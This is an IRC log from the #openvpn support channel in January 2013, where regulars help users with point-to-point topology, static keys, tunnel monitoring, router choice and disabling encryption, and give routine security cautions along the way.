[~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:05 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 21:28 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:43 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 21:45 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 245 seconds] 21:48 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:01 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 22:06 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 22:07 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has joined #openvpn 22:12 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 264 seconds] 22:12 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 22:12 -!- [fred] [fred@konfuzi.us] has quit [Remote host closed the connection] 22:17 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 22:17 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has left #openvpn [] 22:20 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds] 22:21 -!- [fred] [fred@konfuzi.us] has joined #openvpn 22:24 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 23:02 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 23:08 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 23:16 -!- troy- [~troy@dcamp-bbr1.prg1.eu.tauri.ca] has joined #openvpn 23:16 < troy-> is it possible to create a point-to-point VPN with a /30 instead of /32s on each side? 23:21 <+pekster> troy-: This is what the net30 topology does. If your systems support a true PtP mode, why not use that instead? 23:23 < troy-> pekster: my endpoints are ubuntu servers configured based on the http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html tutorial 23:23 <@vpnHelper> Title: Static Key Mini-HOWTO (at openvpn.net) 23:23 < troy-> how would i know whether i can support 'true PtP mode'? 23:23 <+pekster> Linux does (basically it's just Windows that can't) 23:24 < troy-> gotcha - where might i read how to make the necessary changes? 23:24 < troy-> (i prefer PSK over certificates) 23:24 <+pekster> Why? You loose perfect forward secrecy, and if your keys are ever compromised all the past encrypted sessions can be decrypted with the key 23:25 < troy-> i have a lot of tunnels :P 23:25 < troy-> so i guess my answer is simplicity of installation 23:26 <+pekster> I can't say I agree, but as long as you understand the security advantages of a TLS/DH key exchagne and don't want it, that's fine 23:27 < troy-> all the application traffic is encrypted anyway 23:28 < troy-> can you suggest where i might start reading up on the required changes? 23:29 < ngharo> !topology 23:29 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 23:31 < troy-> ngharo: so on the server side i just add directive "topology net30"? 23:32 < ngharo> net30 is the default 23:32 <+pekster> On both sides, since you can't push directives in p2p modes 23:32 < troy-> if that were the case i wouldnt have a /32 mask 23:32 < troy-> pekster: thanks 23:33 <+pekster> I'm not actually sure you can use topology net30 with --secret, but I'm looking into that now. I don't see what you're trying to do, really 23:34 <+pekster> Apparently you can (I suppose to support Windows clients) 23:34 < ngharo> troy-: you'll see your tun interface is configured with inet addr and p-t-p IP, these fall inside the /30 your client is assigned 23:36 < ngharo> (assuming youre currently not specifying topology) 23:36 < troy-> ngharo: i updated the config and restarted the tunnel however ifconfig still shows a mask of .255 23:37 < troy-> i'm just trying to segment my network so that i dont have to advertise /32s 23:37 <+pekster> Well, that's only a limitation of Windows ngharo. I can do 'ifconfig 10.1.2.3 192.168.7.8' just fine if using the p2p topology, as an overly-insane example 23:38 < troy-> pekster: are there additional changes i would have to make to the static key howto that i perhaps dont recognize? 23:38 < troy-> (aside from adding that line to each endpoint and restarting) 23:38 <+pekster> troy-: What are you trying to "fix"? I think Linux distros might use PtP anyway (the net30 is really just a hack to make p2p topology "work" under Windows) 23:40 < ngharo> it kinda of sounds like he may want topology subnet with a /30 ip-pool? 23:40 < ngharo> but only two hosts total on the vpn? i dunno 23:40 <+pekster> He can't *have* an "ip-pool" in p2p mode (he's using --secret, not X509) 23:41 < ngharo> oh, i didnt think static key affected any options 23:41 < ngharo> ignore me :) 23:44 <+pekster> troy-: Yea, I just tested it. net30 under non-Windows just uses PtP anyway, since it's just an emulation trick to make Windows work 23:44 <+pekster> troy-: So, let's get back to why you want this? 23:45 <+pekster> I really have no clue what you're trying to fix, because nothing is broken with a p2p setup 23:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 23:49 < troy-> pekster: i'm going to take this back to the drawing board -- thanks for your help 23:50 <+pekster> troy-: Yea. If you're doing BGP/OSPF or something and want larger routes, you're free to supernet/subnet as you desire, as with any traditional network. But p2p is "just 2 IP addresses", and even the notion of an IP address is just a virutal way to identify your peer 23:51 <+pekster> Technically, you can do something this stupid (PS: demo purposes only, "don't try this at home", etc) https://pastee.org/g65xx 23:52 < ngharo> what the hell pekster lol 23:52 <+pekster> Hey, it was just an example of what you "can" do (and very much should *not* do) ;) 23:53 < ngharo> pekster: are there advantages of using p2p over subnet? 23:53 < troy-> oh my this is interesting :P 23:53 <+pekster> For multi-client (aka server) mode? No, not at all 23:54 < ngharo> why isnt subnet default? for static key configs? 23:54 <+pekster> 'topology p2p' is used when you're doing just a p2p use (such as troy- has configured) or when you need to support OpenVPN 2.0.9 and don't need Windows support (I did a roll-out like that a while back) 23:54 <+pekster> Yea, I think so ngharo. IIRC there's a note in the manpage that it'll become the default 23:54 < ngharo> gotcha 23:55 <+pekster> Our server was 2.1 or 2.2, but the embedded device we were using only supported 2.0.9 or something. It was far easier to use p2p topology (all Linux-based platforms) than get a newer build working with the buildsystem 23:55 <+pekster> Dunno, that was last job 23:56 <+pekster> Oh, btw, assuming I didn't screw up those configs, they're fully usable (drop in static keys and you're set!) and it'll even route across all 4 sytems :D 23:56 <+pekster> http://pekster.sdf.org/misc/crazy-ovpn-p2p.png 23:57 < troy-> i didnt know you could buy yellow paper anymore 23:57 <+pekster> I think that was after around 23 hours of no sleep and half a bottle of wine? Maybe more? ;) 23:58 < ngharo> :] 23:58 < troy-> pekster: is there an easy way to monitor tunnel status for p2p? 23:58 <+pekster> Monitor? As in, if it get disconnected? --up and --down should let you hook into that if you need 23:59 <+pekster> That's available for all modes/topologies --- Day changed Sat Jan 05 2013 00:00 < troy-> that will tell me whether the tunnel is up? 00:00 < sw0rdfish> can someone hack into my openvpn? 00:00 <+pekster> It will with the --ping/--ping-exit (or --ping-restart) options 00:01 <+pekster> Oh, that's server mode only though 00:01 <+pekster> So, no, not really, without pinging your peer or something 00:01 < troy-> gotcha :/ 00:01 < troy-> i have no way to monitor because my network is fully meshed 00:01 <+pekster> If you used X509 mode you could do what you want ;) 00:01 < troy-> *sigh* 00:01 < troy-> may have to 00:02 <+pekster> (that has a TLS control channel where --ping* options or the --keepalive helper directive will detect the presenese of the remote peer) 00:02 < ngharo> what bout querying the management interface 00:03 <+pekster> The problem is if "no" traffic is being sent over a p2p, static-key setup, you can't know if the connection was "dropped" or if it's just silent 00:03 <+pekster> It's like asking me to know if google is up when I'm not sending any traffic there 00:03 < ngharo> ah interesting 00:03 < ngharo> i never played with static key setups 00:03 <+pekster> If *I* can't access google, that doesn't mean they're down, it just means I can't reach it. If the whole channel can't, we might assume google has some issue 00:03 < ngharo> i guess thats why i've heard you say it's better when dealing with dpi firewalls 00:04 <+pekster> Same issue: is the VPN down on the peer, or is my ISP blocking the traffic? We don't know 00:05 <+pekster> sw0rdfish: In theory? Yes. In practice, even a skilled attacker (NSA, etc) would be hard-pressed to do it (they'd probably just sneak into your house and get your keys/passwords while you're at work anyway) 00:06 <+pekster> Ask a more specific question, and get a more specific answer ;) 00:06 < ngharo> !shotgun 00:06 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun. 00:06 < ngharo> love that 00:06 <+pekster> Also on point: https://xkcd.com/538/ 00:06 <@vpnHelper> Title: xkcd: Security (at xkcd.com) 00:07 < ngharo> haha 00:10 < sw0rdfish> pekster, well... its just that when I opened paltalk right now on my laptop, I found another nickname listed there.... it lists all the nicknames with which you have logged on to paltalk at least once 00:10 < sw0rdfish> and I only use one nickname.... and when I saw the other I was like wtffff 00:10 < sw0rdfish> so I dunno. 00:11 <+pekster> I have no clue what "paltalk" is 00:12 <+pekster> OpenVPN, configured, set up, managed, and where all users holding private keys, are operated correctly, is a very, VERY secure system. Weakness at any of those points can reduce the security 00:16 <+pekster> ngharo: Another neat trick with p2p setups (either OpenVPN, or even a crossover Ethernet wire between 2 PCs) is to define the same address on each system, so long as the peer is different. ie: 10.0.0.1 is always "this" system, and 10.0.0.2 is "the other" system ;) 00:17 < ngharo> 0_o 00:17 <+pekster> More for the "don't do that at home" tricks, but it's fun to do with someone watching over your shoulder as you rsync files across 2 PCs with a cat5e and gigE cable between them :D 00:18 < ngharo> i've done crossover for transfering data but i dont get the using same IP part 00:19 < ngharo> how would the other end know to respond on .2? 00:19 <+pekster> Because it's a p2p link ;) 00:20 < ngharo> was this discovery the result of another late night binge? ;) 00:20 <+pekster> No, that trick I knew. I don't usually set up ovpn configs to glue them together unless I'm a bit tipsy ;) 00:20 < ngharo> haha 00:21 <+pekster> Do it on a cross over cable? Sure, it's a fun party trick. Set up a virtual link of 4 systems with complete routing doing it? Now you're just crazy 00:23 < ngharo> virtual daisy chaining 00:23 <+pekster> Yea, basically. It's just a virtual set of a bunch of crossover cables 00:24 < ngharo> goo Devastator 00:24 < ngharo> oops 00:25 < ngharo> good times :) i got a flight to catch in the AM... night all 00:36 -!- HyperGlide [~HyperGlid@182.151.60.13] has joined #openvpn 00:53 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer] 00:53 -!- m0sphere` [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 01:03 -!- HyperGlide [~HyperGlid@182.151.60.13] has quit [Remote host closed the connection] 01:55 -!- brute11k [~brute11k@89.249.235.187] has joined #openvpn 02:15 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 03:33 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Ping timeout: 248 seconds] 03:39 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 04:17 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 04:51 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 04:51 -!- mode/#openvpn [+o mattock] by ChanServ 05:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 05:23 -!- LumberCartel [~LumberCar@96.53.47.42] has joined #openvpn 05:23 -!- LumberCartel [~LumberCar@96.53.47.42] has left #openvpn [] 05:35 -!- ade_b [~Ade@koln-4d0b5627.pool.mediaWays.net] has joined #openvpn 05:35 -!- ade_b [~Ade@koln-4d0b5627.pool.mediaWays.net] has quit [Changing host] 05:35 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:45 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:54 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:10 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection] 06:14 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 06:21 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 06:41 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Quit: Ex-Chat] 07:31 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 07:35 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 244 seconds] 07:35 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 07:46 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 07:48 -!- baobei_ [~baobei@208.111.39.160] has joined #openvpn 07:50 < baobei_> hey ho 07:51 < baobei_> a friend has a kindle fire, afaik openvpn won't work on that, so the only option is to buy a router that supports openvpn 07:51 < baobei_> is there a list of some decent routers that can handle openvpn? 07:52 <+EugeneKay> Anything that supports openwrt or one of the custom embedded firmware linux distros 07:52 < baobei_> is there a recommended minimum ram, cpu requirement 07:53 < baobei_> i once bricked a router trying to install openwrt lol 07:53 <+EugeneKay> ANd you can reflash the Fire to CM10, which definitely does oepnvpn 07:54 < baobei_> it was an xmas gift and he's not very tech savy, i dont think he'd want to mess with it 07:54 <+EugeneKay> I know precisely zero about integrated routers, sorry. I use an i3-540 with 8GB of RAM running a full server stack :-p 07:54 < baobei_> anyway thanks you've pointed me in the right direction 07:56 < baobei_> if anyone knows about openvpn on routers, would 64mb of ram be enough? and 8mb flash, thanks 08:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:23 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Read error: No route to host] 08:23 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 08:38 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [] 08:44 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:46 -!- baobei_ [~baobei@208.111.39.160] has quit [Ping timeout: 245 seconds] 08:47 -!- Porkepix [~Porkepix@83.159.5.235] has quit [Read error: Operation timed out] 08:50 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has joined #openvpn 08:56 -!- baobei_ [~baobei@58.37.20.245] has joined #openvpn 09:08 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 10:01 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 10:19 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has joined #openvpn 10:21 -!- master_of_master [~master_of@p57B52EA2.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 10:22 -!- hg_5_ [~chatzilla@ip-37-209-133-44.free.aero2.net.pl] has joined #openvpn 10:23 -!- master_of_master [~master_of@p57B55186.dip.t-dialin.net] has joined #openvpn 10:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:35 -!- hg_5_ [~chatzilla@ip-37-209-133-44.free.aero2.net.pl] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 10:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:36 < hg_5> hello, i have problem when im trying to connect to my openvpn server, i get this error in openvpngui Error: cannot locate HMAC in incoming packet from 10:36 < hg_5> Error: cannot locate HMAC in incoming packet from xxx.xxx.xxx.xxx:1194 10:37 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:39 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has joined #openvpn 10:45 -!- baobei_ [~baobei@58.37.20.245] has quit [Quit: Leaving] 10:58 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 11:42 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:42 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:42 -!- mode/#openvpn [+o krzee] by ChanServ 12:03 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 12:14 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 12:18 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 12:45 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Ping timeout: 276 seconds] 12:53 -!- piezo [~piezo@pdpc/supporter/active/piezo] has left #openvpn [] 12:55 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 13:13 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has quit [Quit: Computer has gone to sleep.] 13:23 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 13:23 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 13:39 -!- brute11k [~brute11k@89.249.235.187] has quit [Quit: Leaving.] 13:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 13:57 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has joined #openvpn 13:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 14:12 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 14:18 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has joined #openvpn 14:24 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:28 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection timed out] 14:37 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 14:39 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 14:56 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Operation timed out] 15:04 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 15:08 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 15:08 -!- mode/#openvpn [+v s7r] by ChanServ 15:43 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Read error: Connection reset by peer] 16:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 272 seconds] 16:12 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 16:15 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:17 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 16:18 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn 16:19 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Ping timeout: 276 seconds] 16:22 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 240 seconds] 16:24 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 16:45 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 264 seconds] 16:51 -!- u0m3 [~Radu@92.80.90.7] has joined #openvpn 17:02 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 276 seconds] 17:03 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:43 -!- JackWinter2 [~jack@vodsl-4655.vo.lu] has joined #openvpn 17:44 -!- JackWinter2 [~jack@vodsl-4655.vo.lu] has quit [Client Quit] 17:55 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 18:06 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 18:59 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 19:11 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 19:18 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 19:33 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:51 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Quit: emmanuelux] 19:53 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 20:30 -!- u0m3 [~Radu@92.80.90.7] has quit [Quit: Leaving] 20:37 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 20:52 -!- sw0rdfish- [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 20:55 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has joined #openvpn 20:59 -!- sw0rdfish- is now known as sw0rdfish 21:00 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 21:00 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 21:25 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn 21:53 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 21:55 -!- m0sphere` [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Ping timeout: 240 seconds] 22:34 -!- i7c [~i7c@212.47.190.111] has left #openvpn ["WeeChat 0.3.9.2"] 23:05 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:05 -!- mode/#openvpn [+o krzee] by ChanServ 23:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] --- Day changed Sun Jan 06 2013 00:07 -!- kyrix_ [~ashley@71-212-67-12.tukw.qwest.net] has joined #openvpn 00:09 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Ping timeout: 255 seconds] 00:20 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 00:20 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 00:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:20 -!- mode/#openvpn [+o krzee] by ChanServ 00:55 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 01:15 -!- soulcito [~soulse@190.222.252.9] has joined #openvpn 01:15 < soulcito> is possible to configure a openvpn client without encryption? 01:15 <@krzee> !noenc 01:16 <@vpnHelper> "noenc" is (#1) if you're going to disable encryption, you might as well build a GRE tunnel or (#2) but you would use cipher none 01:16 <@krzee> you really dont want openvpn involved if you dont want encryption 01:16 <+pekster> Wow, an 11 second RTO :P 01:16 <@krzee> it will just get in the way =] 01:16 <@krzee> lol 01:16 < soulcito> krzee just need to get a tunnel 01:17 < soulcito> do you know where in ubuntu are the openvpn profiles stored? 01:17 < soulcito> cant find them anywhere 01:17 <@krzee> ya consider gre tunnels, its the tunnel stuff without the encryption 01:17 < soulcito> ive been just configuring the network manager gui 01:17 <@krzee> nooooo 01:17 <@krzee> !netman 01:17 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 01:17 <@krzee> !ubuntu 01:17 <@vpnHelper> "ubuntu" is dont use network manager! 01:17 <+pekster> 'man ip' or 'ip tunnel help' for basisc tunneling 01:18 < Wintereise> krzee smells 01:18 < soulcito> cant change to gre 01:18 < Wintereise> =) 01:18 < Wintereise> Sup 01:18 < soulcito> i need to connect a openvpn server 01:18 < soulcito> no other option 01:18 < soulcito> its a service 01:18 <@krzee> a vpn service without encryption? 01:18 <@krzee> your config MUST match theirs 01:18 < Wintereise> GRE is enabled by default on most linux configs, btw. 01:18 <@krzee> you cant opt to disable encryption if they arent doing the same 01:19 < soulcito> krzee: just need a exit point in US 01:19 <@krzee> you should have been given a config by them, drop that in /etc/openvpn with .conf 01:19 <@krzee> soulcito, that does not change what i said 01:19 <@krzee> if your provider uses encryption, you must... 01:19 < soulcito> the provider let me disable it 01:19 <@krzee> !provider 01:19 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 01:20 <@krzee> they should have given you your config file 01:20 < soulcito> its a webpage with just some option :) 01:20 <@krzee> you will not be able to guess all their config 01:20 < soulcito> i want to make it the lighter possible because my router is dying because of the encryption load 01:20 <@krzee> your router will be running openvpn? 01:21 < soulcito> no 01:21 < soulcito> its a ubuntu behind 01:21 <@krzee> then it wont know about the encryption 01:21 < soulcito> cant red the encryption but it could be trying to inspect it 01:21 <@krzee> unless you're doing deep packet inspection on your router 01:21 < soulcito> it consumes cpu 01:21 < soulcito> inspect/track 01:21 <@krzee> thats dumb, why would it be doing that? 01:22 < Wintereise> nf_conntrack is disable-able even on most mips kernels, if you didn't know. 01:22 < soulcito> well if its udp it need to identify its a connection and let the return packet in 01:22 <@krzee> ^ that wouldnt be special for encrypted packets 01:22 < Wintereise> And what krzee said, your router shouldn't even know what the packet is 01:22 <@krzee> what hes saying would be some deep packet inspection 01:22 < Wintereise> Its job is to send them and receive them, encryption doesn't matter 01:22 < soulcito> maybe not deep packet inspection 01:22 <@krzee> in which case, lol at you for not disabling that on your own vpn 01:22 < Wintereise> krzee, yeah, does sound like DPI 01:23 < soulcito> but at least need to track the connection to let the return packet in 01:23 <@krzee> you mean nat tracking, once again it wont know if its encrypted payload or not 01:23 <@krzee> its just data 01:23 <+pekster> soulcito: Unless you're running OpenVPN on your router, a residential router isn't going to be suffering a higher load to support a client behind it using openvpn with encryption verses without it 01:23 < Wintereise> Sounds like something else is wrong, tbqh 01:23 <+pekster> I can assure you that you are not running a DPI/IDS system without knowing what that is, so I'm pretty sure you don't have one ;) 01:24 < soulcito> well im trying to discard, it could be other option enabled in the ip packet that make my router die 01:24 < soulcito> but in fact it dies 01:24 <@krzee> pekster, ++ 01:24 < soulcito> oh come on 01:24 < soulcito> i know some stuff 01:24 < soulcito> i am network engineer -_- 01:24 <@krzee> oh boy 01:24 * krzee runs 01:24 < Wintereise> lol 01:24 < Wintereise> now now 01:25 < soulcito> lol 01:25 < Wintereise> What kind of router is this? 01:25 <+pekster> Yet you don't know if your router has DPI features? What OSI layer do you suspect your DPI is looking at? L4? L7? Ugh 01:25 < Wintereise> I really suspect any router that has DPI features would be dying from simple vpn packets too 01:25 < Wintereise> So lol 01:25 < soulcito> i was just doing a simple question... dont need to take to degenerate it O_O 01:25 <+pekster> tl;dr: your router doesn't give a crap if you have an unencrypted VPN, encrypted VPN, youtube video, or IRC session 01:26 <@krzee> your answer was given in the first reaponse 01:26 <+pekster> soulcito: If you control both the server and the client and are able to modify encryption options at *BOTH* ends of your VPN peering, look at the --cipher and --alg options in the manpage 01:26 <@krzee> we just felt like you could benefit from additional info 01:26 < soulcito> yeah thank you 01:27 <+pekster> Be aware that all the data running across the link is fully visible to anyone on the wire (on the router path over the Internet, and possibly anyone in their L2 (Ethernet) network as well) 01:27 < soulcito> but you were trying to say I dont know what i am talking about 01:27 <@krzee> right^, and if you dont control the server you shouldnt be configuring it yourself. and you should never configure using network manager 01:27 <@krzee> if you wish to import a working config to network manager to use, thats fine 01:27 <+pekster> When you were talking about your router dying/crashing/locking-up when you use an encyprted VPN, that sounds like BS. And I do networking as a profession 01:27 <@krzee> soulcito, well you did demonstrate that while we talked about your router 01:28 <@krzee> and as a network engineer you get a quicker lashing for it l[ 01:28 <@krzee> ;] 01:28 < soulcito> well i am just checking why it is dying 01:28 < soulcito> not sure what it fails to check 01:28 <+pekster> From a single UDP stream? 01:28 < soulcito> because I dont have the option to troubleshoot in it 01:28 < soulcito> i think it doesnt have 01:28 <@krzee> if theres ANY single udp stream killing it, i would throw it away immediately 01:28 <+pekster> Spend $30 on a router that can run OpenWRT and manage your own network ;) 01:29 <@krzee> ^^^ 01:29 < soulcito> well every router has its limitations depending on the type of traffic 01:29 < soulcito> i have seen a lot of cases 01:29 <@krzee> lol 01:29 <@krzee> seen a lot of them die from a single simple udp stream? 01:29 <@krzee> cause i would call that a fatal bug 01:30 <@krzee> and openvpn has never been known to trigger any neat nukes in routers, although ild consider that awesome 01:30 * krzee ddos'es you with openvpn clients! 01:30 < soulcito> well it recognize it as a lot of connections, the table could go full and run of memory and die 01:30 <@krzee> nope 01:30 <+pekster> No, see, OpenVPN operates over a SINGLE port 01:30 <+pekster> Just one. Ever. 01:31 < soulcito> it could be the same port but different connections 01:31 <@krzee> negative ghostrider 01:31 <@krzee> unless your stuff reeeeeeeeeally sucks in special ways 01:32 -!- brute11k [~brute11k@89.249.235.187] has joined #openvpn 01:32 <@krzee> in which case, see the above suggestion about spending $30 and doing it like a 